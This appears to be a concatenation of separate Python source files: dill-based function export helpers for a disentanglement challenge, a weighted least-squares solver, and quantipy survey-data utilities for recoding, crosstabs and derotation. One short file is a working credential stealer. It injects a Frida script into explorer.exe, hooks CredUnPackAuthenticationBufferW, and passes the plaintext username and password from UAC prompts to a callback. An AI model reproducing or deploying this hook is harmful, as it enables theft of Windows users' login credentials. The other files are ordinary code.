return self.linksPos - 1, self.links[self.linksPos - 1], self.headers, {}
def encoding(self):
return "utf-8"
|
1697986
|
import os
import dill
import numpy as np
def get_function_path(base_path=None, experiment_name=None, make=True):
"""
This function gets the path to where the function is expected to be stored.
Parameters
----------
base_path : str
Path to the directory where the experiments are to be stored.
This defaults to AICROWD_OUTPUT_PATH (see `get_config` above) and which in turn
defaults to './scratch/shared'.
experiment_name : str
Name of the experiment. This defaults to AICROWD_EVALUATION_NAME which in turn
defaults to 'experiment_name'.
    make : bool
        Makes the directory where the returned path leads to (if it doesn't exist already).
Returns
-------
str
        Path to where the function should be stored (to be found by the evaluation function later).
"""
base_path = os.getenv("AICROWD_OUTPUT_PATH","../scratch/shared") \
if base_path is None else base_path
experiment_name = os.getenv("AICROWD_EVALUATION_NAME", "experiment_name") \
if experiment_name is None else experiment_name
model_path = os.path.join(base_path, experiment_name, 'representation', 'python_model.dill')
if make:
os.makedirs(os.path.dirname(model_path), exist_ok=True)
os.makedirs(os.path.join(os.path.dirname(model_path), 'results'), exist_ok=True)
return model_path
def export_function(fn, path=None):
"""
Exports a function. This tries to serialize the argument `fn`, which must be callable
and expect as input a numpy tensor of shape NCHW, where N (batch-size) can be arbitrary,
C (channel) is the number of input channels, and (H, W) are the dimensions of the image.
There are no guarantees that the serialization works as expected - you should double
check that this is indeed the case by importing the function.
Parameters
----------
fn : callable
Function to be serialized.
path : str
        Path to the file where the function is saved. Defaults to the value set by the
        `get_function_path` function above.
Returns
-------
str
Path to where the function is saved.
"""
assert callable(fn), "Provided function should at least be callable..."
path = get_function_path() if path is None else path
with open(path, 'wb') as f:
dill.dump(fn, f, protocol=dill.HIGHEST_PROTOCOL)
return path
def import_function(path=None):
"""
Imports a function from file.
Parameters
----------
path : str
Path to where the function is saved. Defaults to the return value of `get_function_path`
function defined above.
Returns
-------
callable
"""
path = get_function_path() if path is None else path
with open(path, 'rb') as f:
# Here goes nothing...
fn = dill.load(f)
return fn
def make_representor(fn, format='NCHW'):
"""
Wraps a function in another callable that can be used by `disentanglement_lib`.
Parameters
----------
fn : callable
Function to be wrapped.
format : str
Input format expected by `fn`. Can be NCHW or NHWC, where
N: batch
C: channels
H: height
W: width
Returns
-------
callable
"""
assert format in ['NCHW', 'NHWC'], f"format must either be NCHW or NHWC; got {format}."
def _represent(x):
assert isinstance(x, np.ndarray), \
f"Input to the representation function must be a ndarray, got {type(x)} instead."
assert x.ndim == 4, \
f"Input to the representation function must be a four dimensional NHWC array, " \
f"got a {x.ndim}-dimensional array of shape {x.shape} instead."
# Convert from NHWC to NCHW
if format == 'NCHW':
x = np.moveaxis(x, 3, 1)
N, C, H, W = x.shape
else:
N, H, W, C = x.shape
# Call the function on the array and validate its shape
y = fn(x)
assert isinstance(y, np.ndarray), f"Output from the representation function " \
f"should be a numpy array, got {type(y)} instead."
assert y.ndim == 2, "Output from the representation function should be two dimensional."
return y
return _represent
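# --- Usage sketch (added for illustration; not part of the original module).
# A minimal export/import round trip, assuming `os`, `dill` and `numpy as np`
# are imported at the top of this file. The flattening `fn` below and the
# temporary path are hypothetical stand-ins.
if __name__ == '__main__':
    import tempfile

    def fn(x):
        # Map each NCHW image batch to flat representation vectors.
        return x.reshape(x.shape[0], -1)

    tmp_path = os.path.join(tempfile.mkdtemp(), 'python_model.dill')
    saved_path = export_function(fn, path=tmp_path)
    represent = make_representor(import_function(saved_path), format='NCHW')
    batch = np.random.rand(8, 64, 64, 3)  # NHWC, as disentanglement_lib sends it
    assert represent(batch).shape == (8, 64 * 64 * 3)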
|
1698092
|
from PyHook import wait_for_process, on_credential_submit, log
import frida
import sys
hook_process_name = "explorer"
def logger(message):
log(hook_process_name, message)
def wait_for():
hook()
def hook():
try:
logger("Trying To Hook Into Explorer")
session = frida.attach("explorer.exe")
logger(f"Hooked Explorer")
# We Listen to the CredUnPackAuthenticationBufferW func from Credui.dll to catch the user and pass in plain text
script = session.create_script("""
var username;
var password;
var CredUnPackAuthenticationBufferW = Module.findExportByName("Credui.dll", "CredUnPackAuthenticationBufferW")
Interceptor.attach(CredUnPackAuthenticationBufferW, {
onEnter: function (args)
{
username = args[3];
password = args[7];
},
onLeave: function (result)
{
var user = username.readUtf16String()
var pass = password.readUtf16String()
if (user && pass)
{
send("\\n=============================" + "\\n[+] Intercepted Creds from UAC" + "\\nUsername : " + user + "\\nPassword : " + pass +"\\n=============================" );
}
}
});
""")
        # Route messages sent from the injected script to on_credential_submit
script.on('message', on_credential_submit)
script.load()
        sys.stdin.read()  # block so the injected script stays loaded
except Exception as e:
logger("Unhandled exception: " + str(e))
logger("Continuing...")
|
1698109
|
import numpy as np
from scipy.sparse import linalg
def weighted_mean(x, w):
# numpy.average can do the same computation
assert(x.shape == w.shape)
s = w.sum()
if s == 0:
raise ValueError("Sum of weights is zero")
return (x * w).sum() / s
def get_solver_(method, **kwargs):
def lstsq(A, b):
x, _, _, _ = np.linalg.lstsq(A, b, **kwargs)
return x
def cg(A, b):
x, _ = linalg.cg(np.dot(A.T, A), np.dot(A.T, b), **kwargs)
return x
if method == "lstsq":
return lstsq
if method == "cg":
return cg
def solve_linear_equation(A, b, weights=None, method="lstsq", **kwargs):
    solve = get_solver_(method, **kwargs)
assert(A.shape[0] == b.shape[0])
if weights is None:
return solve(A, b)
assert(A.shape[0] == weights.shape[0])
w = np.sqrt(weights)
b = b * w
A = A * w.reshape(-1, 1)
return solve(A, b)
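# --- Usage sketch (added for illustration; not part of the original module).
# Weighted least squares by row scaling: multiplying each row of A and b by
# sqrt(w_i) makes the ordinary solver minimise sum_i w_i * r_i**2.
# Assumes numpy >= 1.17 for default_rng.
if __name__ == "__main__":
    rng = np.random.default_rng(0)
    A = rng.normal(size=(50, 3))
    x_true = np.array([1.0, -2.0, 0.5])
    b = A @ x_true + 0.01 * rng.normal(size=50)
    w = rng.uniform(0.1, 1.0, size=50)
    x_hat = solve_linear_equation(A, b, weights=w, method="lstsq", rcond=None)
    assert np.allclose(x_hat, x_true, atol=0.05)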
|
1698138
|
import numpy as np
import pandas as pd
import quantipy as qp
import copy
import re
import warnings
from quantipy.core.tools.dp.query import uniquify_list
from quantipy.core.helpers.functions import (
emulate_meta,
cpickle_copy,
get_rules_slicer,
get_rules,
paint_dataframe
)
from quantipy.core.tools.view.logic import (
has_any,
get_logic_index,
intersection
)
from quantipy.core.rules import Rules
def recode_into(data, col_from, col_to, assignment, multi=False):
''' Recodes one column based on the values of another column
codes = [([10, 11], 1), ([8, 9], 2), ([1, 2, 3, 5, 6, 7, ], 3)]
data = recode_into(data, 'CONNECTIONS4', 'CONNECTIONS4_nps', codes)
'''
s = pd.Series()
for group in assignment:
for val in group[0]:
data[col_to] = np.where(data[col_from] == val, group[1], np.NaN)
s = s.append(data[col_to].dropna())
data[col_to] = s
return data
def create_column(name, type_name, text='', values=None):
''' Returns a column object that can be stored into a Quantipy meta
document.
'''
column = {
'name': name,
'type': type_name,
'text': text
}
if not values is None:
column['values'] = values
return column
def define_multicodes(varlist, meta):
multicodes = {}
for var in varlist:
multicodes.update({var: [mrs_q for mrs_q in meta['columns'] if mrs_q.startswith(var + '_')]})
return multicodes
def dichotomous_from_delimited(ds, value_map=None, sep=';', trailing_sep=True,
dichotom=[1, 2]):
''' Returns a dichotomous set DataFrame from ds, being a series storing
delimited set data separated by 'sep'
ds - (pandas.Series) a series storing delimited set data
value_map - (list-like, optional) the values to be anticipated as unique
in ds
sep - (str, optional) the character/s to use to delimit ds
trailing_sep - (bool, optional) is sep trailing all items in ds?
    dichotom - (list-like, optional) the dichotomous values to use [yes, no]
'''
    ds_split = ds.dropna().str.split(sep)
if value_map is None:
value_map = get_delimited_value_map(ds, ds_split, sep)
df = pd.DataFrame(data=dichotom[1], index=ds.index, columns=value_map)
    for idx in ds_split.index:
        if trailing_sep:
            cols = ds_split.loc[idx][:-1]
        else:
            cols = ds_split.loc[idx][:]
        df.loc[idx, cols] = dichotom[0]
return df
def get_delimited_value_map(ds, ds_split=None, sep=';'):
''' Returns a sorted list of unique values found in ds, being a series
storing delimited set data separated by sep
ds - (pandas.Series) a series storing delimited set data
ds_split - (pandas.DataFrame, optional) an Excel-style text-to-columns
version of ds
sep - (str, optional) the character/s to use to delimit ds
'''
if ds_split is None:
ds_split = ds.dropna().str.split(sep)
delimited = pd.DataFrame(ds_split.tolist())
value_map = pd.unique(delimited.values.ravel())
value_map = np.sort(value_map[value_map.nonzero()])
return value_map
def derotate_column_group(data, cols, rotation_name='rotation',
data_name='data', dropna=True,
rotation_map=None):
''' Stacks the given columns from data, optionally renaming the
    resulting rotation and data columns, mapping the values found in
the rotation column, and appending the rotation column onto the index.
Parameters
----------
data : pandas.DataFrame
The data from which the hierarchical groups are being drawn.
cols : list
A list column names that need to be stacked from the source
data.
rotation_name : str
The name to be given to the rotation series that results from
the pandas.DataFrame.stack() operation.
data_name : str
The name to be given to the data series that results from
the pandas.DataFrame.stack() operation.
dropna: boolean (optional; default=True)
Passed through to the pandas.DataFrame.stack() operation.
rotation_map: list (optional; default=None)
The list of values/labels used to identify each resulting
stacked row. Using a mapper allows multi-question hierarchies
to be merged together because the resulting MultiIndexes will
match.
'''
    # For multi-level hierarchies, capture the new level number about
    # to be added
if isinstance(data.index, pd.MultiIndex):
new_level = len(data.index.levels)
else:
new_level = 1
df = data[cols].stack(dropna=dropna).reset_index(level=[new_level])
df.columns = [rotation_name, data_name]
if not rotation_map is None:
df[rotation_name] = df[rotation_name].map(rotation_map)
df.set_index([rotation_name], append=True, drop=True, inplace=True)
return df
def derotate(data, input_mapper, output_mapper, others=None, dropna=True):
"""
Derotate data using the given input_mapper, and appending others.
This function derotates data using the specification defined in
input_mapper, which is a list of dicts of lists, describing how
    columns from data can be read as a hierarchical structure.
Parameters
----------
data : pandas.DataFrame
The data from which the hierarchical groups are being drawn.
input_mapper : list of dicts of lists
A list of dicts matching where the new column names are keys to
to lists of source columns.
output_mapper : dict
The name and values to be given to the rotation index in the
output dataframe.
others: list (optional; default=None)
A list of additional columns from the source data to be appended
to the end of the resulting stacked dataframe.
dropna: boolean (optional; default=True)
Passed through to the pandas.DataFrame.stack() operation.
Returns
----------
df : pandas.DataFrame
The stacked dataframe.
"""
    # For multi-level hierarchies, capture the new level number about
    # to be added
if isinstance(data.index, pd.MultiIndex):
new_level = len(data.index.levels)
else:
new_level = 1
rotation_name = output_mapper.keys()[0]
rotation_index = output_mapper[rotation_name]
# Collect all of the stacked column groups into a list
dfs = []
for question_group in input_mapper:
question_name = question_group.keys()[0]
question_columns = question_group.values()[0]
df = derotate_column_group(
data=data,
cols=question_columns,
rotation_name=rotation_name,
data_name=question_name,
dropna=dropna,
rotation_map=dict(zip(question_columns, rotation_index))
)
dfs.append(df)
# Join all of the stacked dataframes together
df = pd.concat(dfs, axis=1)
if not others is None:
# Merge in additional columns from the source data
df.reset_index(level=[new_level], inplace=True)
df = df.join(data[others])
df.set_index([rotation_name], append=True, drop=True, inplace=True)
return df
def start_meta(text_key='main'):
"""
Starts a new Quantipy meta document.
Parameters
----------
text_key : str, default='main'
The default text key to be set into the new meta document.
Returns
-------
meta : dict
Quantipy meta object
"""
meta = {
'info': {
'text': ''
},
'lib': {
'default text': text_key,
'values': {}
},
'columns': {},
'masks': {},
'sets': {
'data file': {
'text': {text_key: 'Variable order in source file'},
'items': []
}
},
'type': 'pandas.DataFrame'
}
return meta
def condense_dichotomous_set(df, values_from_labels=True, sniff_single=False,
yes=1, no=0, values_regex=None):
"""
Condense the given dichotomous columns to a delimited set series.
Parameters
----------
df : pandas.DataFrame
The column/s in the dichotomous set. This may be a single-column
DataFrame, in which case a non-delimited set will be returned.
values_from_labels : bool, default=True
Should the values used for each response option be taken from
the dichotomous column names using the rule name.split('_')[-1]?
If not then the values will be sequential starting from 1.
sniff_single : bool, default=False
Should the returned series be given as dtype 'int' if the
maximum number of responses for any row is 1?
Returns
-------
    series : pandas.Series
        The converted series.
"""
# Anything not counted as yes or no should be treated as no
df = df.applymap(lambda x: x if x in [yes, no] else no)
# Convert to delimited set
df_str = df.astype('str')
for v, col in enumerate(df_str.columns, start=1):
if values_from_labels:
if values_regex is None:
v = col.split('_')[-1]
else:
try:
v = str(int(re.match(values_regex, col).groups()[0]))
except AttributeError:
raise AttributeError(
"Your values_regex may have failed to find a match"
" using re.match('{}', '{}')".format(
values_regex, col))
else:
v = str(v)
# Convert to categorical set
df_str[col].replace(
{
'nan': 'nan',
'{}.0'.format(no): 'nan',
'{}'.format(no): 'nan'
},
inplace=True
)
df_str[col].replace(
{
'{}'.format(yes): v,
'{}.0'.format(yes): v
},
inplace=True
)
# Concatenate the rows
series = df_str.apply(
lambda x: ';'.join([
v
for v in x.tolist()
if v != 'nan'
]),
axis=1
)
# Add trailing delimiter
series = series + ';'
    # Use NaNs to represent empty
series.replace(
{';': np.NaN},
inplace=True
)
if df.dropna().size==0:
# No responses are known, return filled with NaN
return series
if sniff_single and df.sum(axis=1).max()==1:
# Convert to float
series = series.str.replace(';','').astype('float')
return series
return series
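# --- Illustrative check (added for illustration; not part of the original
# module). Three dichotomous columns condense to one delimited set; the
# response values come from the column-name suffixes ('q1_1' -> '1', etc.).
def _demo_condense_dichotomous_set():
    df = pd.DataFrame({'q1_1': [1, 0, 0],
                       'q1_2': [1, 1, 0],
                       'q1_3': [0, 0, 0]})
    series = condense_dichotomous_set(df[['q1_1', 'q1_2', 'q1_3']])
    assert series.tolist()[:2] == ['1;2;', '2;']
    assert pd.isnull(series[2])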
def split_series(series, sep, columns=None):
"""
Splits all the items of a series using the given delimiter.
Splits each item in series using the given delimiter and returns
a DataFrame (as per Excel text-to-columns). Optionally, you can
pass in a list of column names that should be used to name the
resulting columns.
Parameters
----------
series : pandas.Series
The series that should be split.
sep : str
The separator that should be used to split the series.
columns : list-list, default=None
A list of names that should be set into the resulting DataFrame
columns.
Returns
-------
df : pandas.DataFrame
Series, split by sep, returned as a DataFrame.
"""
df = pd.DataFrame(series.astype('str').str.split(sep).tolist())
if not columns is None:
df.columns = columns
return df
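# --- Illustrative check (added for illustration; not part of the original
# module).
def _demo_split_series():
    s = pd.Series(['a,b', 'c,d'])
    df = split_series(s, ',', columns=['first', 'second'])
    assert df['first'].tolist() == ['a', 'c']
    assert df['second'].tolist() == ['b', 'd']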
def frange(range_def, sep=','):
"""
Return the full, unabbreviated list of ints suggested by range_def.
This function takes a string of abbreviated ranges, possibly
delimited by a comma (or some other character) and extrapolates
its full, unabbreviated list of ints.
Parameters
----------
range_def : str
The range string to be listed in full.
sep : str, default=','
The character that should be used to delimit discrete entries in
range_def.
Returns
-------
res : list
The exploded list of ints indicated by range_def.
"""
res = []
for item in range_def.split(sep):
if '-' in item:
a, b = item.split('-')
a, b = int(a), int(b)
lo = min([a, b])
hi = max([a, b])
ints = range(lo, hi+1)
if b <= a:
ints = list(reversed(ints))
res.extend(ints)
else:
res.append(int(item))
return res
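# --- Illustrative check (added for illustration; not part of the original
# module). Ascending ranges expand in order; descending ranges keep their
# direction.
def _demo_frange():
    assert frange('1-3,5,8-6') == [1, 2, 3, 5, 8, 7, 6]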
def frequency(meta, data, x=None, y=None, weight=None, rules=False, **kwargs):
"""
Return a type-appropriate frequency of x.
This function uses the given meta and data to create a
type-appropriate frequency table of the named x variable.
The result may be either counts or column percentages, weighted
or unweighted.
Parameters
----------
meta : dict
Quantipy meta document.
data : pandas.DataFrame
Data accompanying the given meta document.
x : str, default=None
The column of data for which a frequency should be generated
on the x-axis.
y : str, default=None
The column of data for which a frequency should be generated
on the y-axis.
kwargs : kwargs
All remaining keyword arguments will be passed along to the
crosstab function.
Returns
-------
f : pandas.DataFrame
The frequency as a pandas DataFrame.
"""
if x is None and y is None:
raise ValueError(
"You must provide a value for either x or y."
)
elif not x is None and not y is None:
raise ValueError(
"You may only provide a value for either x or y, and not"
" both, when generating a frequency."
)
if rules and isinstance(rules, bool):
rules = ['x', 'y']
if x is None:
x = '@'
col = y
if rules:
rules_axis = 'y'
transpose = True
if not 'y' in rules:
rules = False
else:
y = '@'
col = x
if rules:
rules_axis = 'x'
transpose = False
if not 'x' in rules:
rules = False
if rules:
try:
if col in meta['columns']:
rules = meta['columns'][col]['rules'][rules_axis]
elif col in meta['masks']:
rules = meta['masks'][col]['rules'][rules_axis]
except:
rules = False
if not qp.OPTIONS['new_rules']:
try:
with_weight = rules['sortx']['with_weight']
except:
with_weight = weight
else:
with_weight = weight
else:
with_weight = weight
f = crosstab(
meta, data, x, y,
weight=with_weight,
rules=False,
xtotal=False,
**kwargs)
if rules:
if not qp.OPTIONS['new_rules']:
if transpose:
f = f.T
rules_slicer = get_rules_slicer(f, rules)
f = f.loc[rules_slicer]
if transpose:
f = f.T
else:
f = crosstab(
meta, data, x, y,
weight=with_weight,
rules=True,
xtotal=False,
**kwargs)
return f
def crosstab(meta, data, x, y, get='count', decimals=1, weight=None,
show='values', rules=False, xtotal=False):
"""
Return a type-appropriate crosstab of x and y.
This function uses the given meta and data to create a
type-appropriate cross-tabulation (pivot table) of the named x and y
variables. The result may be either counts or column percentages,
weighted or unweighted.
Parameters
----------
meta : dict
Quantipy meta document.
data : pandas.DataFrame
Data accompanying the given meta document.
x : str
The variable that should be placed into the x-position.
y : str
The variable that should be placed into the y-position.
get : str, default='count'
Control the type of data that is returned. 'count' will return
absolute counts and 'normalize' will return column percentages.
decimals : int, default=1
Control the number of decimals in the returned dataframe.
weight : str, default=None
The name of the weight variable that should be used on the data,
if any.
show : str, default='values'
How the index and columns should be displayed. 'values' returns
the raw value indexes. 'text' returns the text associated with
each value, according to the text key
meta['lib']['default text']. Any other str value is assumed to
be a non-default text_key.
rules : bool or list-like, default=False
If True then all rules that are found will be applied. If
list-like then rules with those keys will be applied.
xtotal : bool, default=False
If True, the first column of the returned dataframe will be the
regular frequency of the x column.
Returns
-------
df : pandas.DataFrame
The crosstab as a pandas DataFrame.
"""
stack = qp.Stack(name='ct', add_data={'ct': {'meta': meta, 'data': data}})
stack.add_link(x=x, y=y)
link = stack['ct']['no_filter'][x][y]
q = qp.Quantity(link, weight=weight).count()
weight_notation = '' if weight is None else weight
if get=='count':
df = q.result
vk = 'x|f|:||{}|counts'.format(weight_notation)
elif get=='normalize':
df = q.normalize().result
vk = 'x|f|:|y|{}|c%'.format(weight_notation)
else:
raise ValueError(
"The value for 'get' was not recognized. Should be 'count' or "
"'normalize'."
)
df = np.round(df, decimals=decimals)
if rules and isinstance(rules, bool):
rules = ['x', 'y']
if rules:
if qp.OPTIONS['new_rules']:
# new rules application
# ----------------------------------------------------------------
view = qp.core.view.View(link, vk)
view.dataframe = df
link[vk] = view
rulesobj = Rules(link, vk, axes=rules)
rulesobj.apply()
if rulesobj.x_rules and 'x' in rules:
idx = rulesobj.rules_df().index
if not 'All' in idx.get_level_values(1).tolist():
df_index = [(link.x, 'All')] + idx.values.tolist()
else:
df_index = idx.values.tolist()
df = df.loc[df_index]
if rulesobj.y_rules and 'y' in rules:
idx = rulesobj.rules_df().columns
if not 'All' in idx.get_level_values(1).tolist():
df_columns = [(link.y, 'All')] + idx.values.tolist()
else:
df_columns = idx.values.tolist()
df = df[df_columns]
else:
# OLD!
# ================================================================
rules_x = get_rules(meta, x, 'x')
if not rules_x is None and 'x' in rules:
fx = frequency(meta, data, x=x, weight=weight, rules=True)
if q._get_type() == 'array':
df = df.T
df = df.loc[fx.index.values]
df = df.T
else:
df = df.loc[fx.index.values]
rules_y = get_rules(meta, y, 'y')
if not rules_y is None and 'y' in rules:
fy = frequency(meta, data, y=y, weight=weight, rules=True)
df = df[fy.columns.values]
if show!='values':
if show=='text':
text_key = meta['lib']['default text']
else:
text_key = show
if not isinstance(text_key, dict):
text_key = {'x': text_key, 'y': text_key}
df = paint_dataframe(meta, df, text_key)
    if xtotal:
        try:
            f = frequency(
                meta, data, x,
                get=get, decimals=decimals, weight=weight, show=show)
            f = f.loc[df.index.values]
            df = pd.concat([f, df], axis=1)
        except:
            pass
if q._get_type() == 'array':
df = df.T
return df
def verify_test_results(df):
"""
Verify tests results in df are consistent with existing columns.
This function verifies that all of the test results present in df
only refer to column headings that actually exist in df. This is
needed after rules have been applied at which time some columns
may have been dropped.
Parameters
----------
df : pandas.DataFrame
The view dataframe showing column tests results.
Returns
-------
df : pandas.DataFrame
The view dataframe showing edited column tests results.
"""
def verify_test_value(value):
"""
Verify a specific test value.
"""
if isinstance(value, str):
is_minimum = False
is_small = False
if value.endswith('*'):
if value.endswith('**'):
is_minimum = True
value = value[:-2]
else:
is_small = True
value = value[:-1]
if '@' in value:
test_total = value[1:5]
if len(value) <= 6:
if is_minimum:
value = value + '**'
elif is_small:
value = value + '*'
return value
else:
value = value.replace(test_total, '').replace('[, ', '[')
else:
test_total = None
if len(value)>0:
if len(value)==1:
value = set(value)
else:
value = set([int(i) for i in list(value[1:-1].split(','))])
value = cols.intersection(value)
if not value:
value = ''
elif len(value)==1:
value = str(list(value))
else:
value = str(sorted(list(value)))
if test_total:
value = value.replace('[', '[{}, '.format(test_total))
if is_minimum:
value = value + '**'
elif is_small:
value = value + '*'
elif len(value)==0:
value = np.NaN
return value
else:
return value
cols = set([int(v) for v in zip(*[c for c in df.columns])[1]])
df = df.applymap(verify_test_value)
return df
def index_mapper(meta, data, mapper, default=None, intersect=None):
"""
Convert a {value: logic} map to a {value: index} map.
This function takes a mapper of {key: logic} entries and resolves
the logic statements using the given meta/data to return a mapper
of {key: index}. The indexes returned can be used on data to isolate
the cases described by arbitrarily complex logical statements.
Parameters
----------
meta : dict
Quantipy meta document.
data : pandas.DataFrame
Data accompanying the given meta document.
mapper : dict
A mapper of {key: logic}
default : str
The column name to default to in cases where unattended lists
are given as logic, where an auto-transformation of {key: list}
to {key: {default: list}} is provided.
Returns
-------
index_mapper : dict
A mapper of {key: index}
"""
if default is None:
# Check that mapper isn't in a default-requiring
# format
for key, val in mapper.iteritems():
if not isinstance(val, (dict, tuple)):
raise TypeError(
"'%s' recode definition appears to be using "
"default-shorthand but no value for 'default'"
"was given." % (key)
)
keyed_mapper = mapper
else:
# Use default to correct the form of the mapper
# where un-keyed value lists were given
# Creates: {value: {source: logic}}
keyed_mapper = {
key:
{default: has_any(val)}
if isinstance(val, list)
else {default: val}
for key, val in mapper.iteritems()
}
# Apply any implied intersection
if not intersect is None:
keyed_mapper = {
key: intersection([
intersect,
value if isinstance(value, dict) else {default: value}])
for key, value in keyed_mapper.iteritems()
}
# Create temp series with a full data index
series = pd.Series(1, index=data.index)
# Return indexes from logic statements
# Creates: {value: index}
index_mapper = {
key: get_logic_index(series, logic, data)[0]
for key, logic in keyed_mapper.iteritems()
}
return index_mapper
def join_delimited_set_series(ds1, ds2, append=True):
"""
Item-wise join of two delimited sets.
    This function joins two delimited set series item-wise, either
    appending the items found in ds2 to those found in ds1 (the default)
    or overwriting ds1 items wherever ds2 has data.
Parameters
----------
ds1 : pandas.Series
First delimited set series to join.
ds2 : pandas.Series
Second delimited set series to join.
append : bool
Should the data in ds2 (where found) be appended to items from
ds1? If False, data from ds2 (where found) will overwrite
whatever was found for that item in ds1 instead.
Returns
-------
joined : pandas.Series
The joined result of ds1 and ds2.
"""
if pd.__version__ == '0.19.2':
df = pd.concat([ds1, ds2], axis=1, ignore_index=True)
else:
df = pd.concat([ds1, ds2], axis=1)
df.fillna('', inplace=True)
if append:
df['joined'] = df[0] + df[1]
else:
df['joined'] = df[0].copy()
df[1] = df[1].replace('', np.NaN)
df['joined'].update(df[1].dropna())
joined = df['joined'].replace('', np.NaN)
return joined
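# --- Illustrative check (added for illustration; not part of the original
# module). With append=True, items found in ds2 are appended to ds1's items.
def _demo_join_delimited_set_series():
    ds1 = pd.Series(['1;', np.NaN])
    ds2 = pd.Series(['2;3;', '2;'])
    joined = join_delimited_set_series(ds1, ds2, append=True)
    assert joined.tolist() == ['1;2;3;', '2;']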
def recode_from_index_mapper(meta, series, index_mapper, append):
"""
    Recode a series from a mapper of {value: index} entries.
    This function injects each key of index_mapper into the target
    series at the locations given by its paired index, respecting the
    column type declared in the meta (delimited sets are condensed
    and re-joined as needed).
Parameters
----------
meta : dict
Quantipy meta document.
series : pandas.Series
The series in which the recoded data will be stored and
returned.
index_mapper : dict
A mapper of {key: index}
append : bool
        Should the new recoded data be appended to items already found
        in series? If False, the new recoded data will overwrite
        whatever was already found in series instead.
Returns
-------
series : pandas.Series
The series in which the recoded data will be stored and
returned.
"""
qtype = meta['columns'][series.name]['type']
if qtype in ['delimited set']:
if series.dtype in ['int64', 'float64']:
            not_null = series.notnull()
            if not_null.any():
                series.loc[not_null] = series.loc[not_null].map(str) + ';'
if index_mapper:
cols = [str(c) for c in sorted(index_mapper.keys())]
else:
vals = meta['columns'][series.name]['values']
codes = [c['value'] for c in vals]
cols = [str(c) for c in codes]
ds = pd.DataFrame(0, index=series.index, columns=cols)
        for key, idx in index_mapper.iteritems():
            ds.loc[idx, str(key)] = 1
ds2 = condense_dichotomous_set(ds)
org_name = series.name
series = join_delimited_set_series(series, ds2, append)
## Remove potential duplicate values
if series.dropna().empty:
warn_msg = 'Could not recode {}, found empty data column dependency!'.format(org_name)
warnings.warn(warn_msg)
return series
ds = series.str.get_dummies(';')
# Make sure columns are in numeric order
ds.columns = [int(float(c)) for c in ds.columns]
cols = sorted(ds.columns.tolist())
ds = ds[cols]
ds.columns = [str(i) for i in ds.columns]
# Reconstruct the dichotomous set
series = condense_dichotomous_set(ds)
elif qtype in ['single', 'int', 'float']:
for key, idx in index_mapper.iteritems():
series.loc[idx] = key
else:
raise TypeError(
"Can't recode '{col}'. Recoding for '{typ}' columns is not"
" yet supported.".format(col=series.name, typ=qtype)
)
return series
def recode(meta, data, target, mapper, default=None, append=False,
intersect=None, initialize=None, fillna=None):
"""
Return a new or copied series from data, recoded using a mapper.
This function takes a mapper of {key: logic} entries and injects the
key into the target column where its paired logic is True. The logic
may be arbitrarily complex and may refer to any other variable or
variables in data. Where a pre-existing column has been used to
start the recode, the injected values can replace or be appended to
any data found there to begin with. Note that this function does
not edit the target column, it returns a recoded copy of the target
column. The recoded data will always comply with the column type
indicated for the target column according to the meta.
Parameters
----------
meta : dict
Quantipy meta document.
data : pandas.DataFrame
Data accompanying the given meta document.
target : str
The column name that is the target of the recode. If target
is not found in meta['columns'] this will fail with an error.
If target is not found in data.columns the recode will start
from an empty series with the same index as data. If target
is found in data.columns the recode will start from a copy
of that column.
mapper : dict
A mapper of {key: logic} entries.
default : str, default=None
The column name to default to in cases where unattended lists
are given in your logic, where an auto-transformation of
{key: list} to {key: {default: list}} is provided. Note that
lists in logical statements are themselves a form of shorthand
and this will ultimately be interpreted as:
{key: {default: has_any(list)}}.
append : bool, default=False
        Should the new recoded data be appended to values already found
        in the series? If False, the new recoded data will overwrite
        whatever was already found in the series instead.
intersect : logical statement, default=None
If a logical statement is given here then it will be used as an
implied intersection of all logical conditions given in the
mapper.
initialize : str or np.NaN, default=None
If not None, a copy of the data named column will be used to
populate the target column before the recode is performed.
Alternatively, initialize can be used to populate the target
column with np.NaNs (overwriting whatever may be there) prior
to the recode.
fillna : int, default=None
If not None, the value passed to fillna will be used on the
recoded series as per pandas.Series.fillna().
Returns
-------
series : pandas.Series
The series in which the recoded data is stored.
"""
# Error handling
# Check meta, data
if not isinstance(meta, dict):
raise ValueError("'meta' must be a dictionary.")
if not isinstance(data, pd.DataFrame):
raise ValueError("'data' must be a pandas.DataFrame.")
# Check mapper
if not isinstance(mapper, dict):
raise ValueError("'mapper' must be a dictionary.")
# Check target
if not isinstance(target, (str, unicode)):
raise ValueError("The value for 'target' must be a string.")
if not target in meta['columns']:
raise ValueError("'%s' not found in meta['columns']." % (target))
# Check append
if not isinstance(append, bool):
raise ValueError("'append' must be boolean.")
# Check column type vs append
if append and meta['columns'][target]['type']!="delimited set":
raise TypeError("'{}' is not a delimited set, cannot append.")
# Check default
if not default is None:
if not isinstance(default, (str, unicode)):
raise ValueError("The value for 'default' must be a string.")
if not default in meta['columns']:
raise ValueError("'%s' not found in meta['columns']." % (default))
# Check initialize
initialize_is_string = False
if not initialize is None:
if isinstance(initialize, (str, unicode)):
initialize_is_string = True
if not initialize in meta['columns']:
raise ValueError("'%s' not found in meta['columns']." % (target))
elif not np.isnan(initialize):
raise ValueError(
"The value for 'initialize' must either be"
" a string naming an existing column or np.NaN.")
# Resolve the logic to a mapper of {key: index}
index_map = index_mapper(meta, data, mapper, default, intersect)
# Get/create recode series
if not initialize is None:
if initialize_is_string:
# Start from a copy of another existing column
series = data[initialize].copy()
else:
# Ignore existing series for target, start with NaNs
series = pd.Series(np.NaN, index=data.index, copy=True)
elif target in data.columns:
# Start with existing target column
series = data[target].copy()
else:
# Start with NaNs
series = pd.Series(np.NaN, index=data.index, copy=True)
# Name the recoded series
series.name = target
# Use the index mapper to edit the target series
series = recode_from_index_mapper(meta, series, index_map, append)
# Rename the recoded series
series.name = target
if not fillna is None:
col_type = meta['columns'][series.name]['type']
if col_type=='single':
series.fillna(fillna, inplace=True)
elif col_type=='delimited set':
series.fillna('{};'.format(fillna), inplace=True)
return series
def merge_text_meta(left_text, right_text, overwrite=False):
"""
Merge known text keys from right to left, add unknown text_keys.
"""
if overwrite:
left_text.update(right_text)
else:
for text_key in right_text.keys():
if not text_key in left_text:
left_text[text_key] = right_text[text_key]
return left_text
def merge_values_meta(left_values, right_values, overwrite=False):
"""
Merge known left values from right to left, add unknown values.
"""
for val_right in right_values:
found = False
for i, val_left in enumerate(left_values):
if val_left['value']==val_right['value']:
found = True
left_values[i]['text'] = merge_text_meta(
val_left['text'],
val_right['text'],
overwrite=overwrite)
if not found:
left_values.append(val_right)
return left_values
def merge_column_metadata(left_column, right_column, overwrite=False):
"""
Merge the metadata from the right column into the left column.
"""
_compatible_types(left_column, right_column)
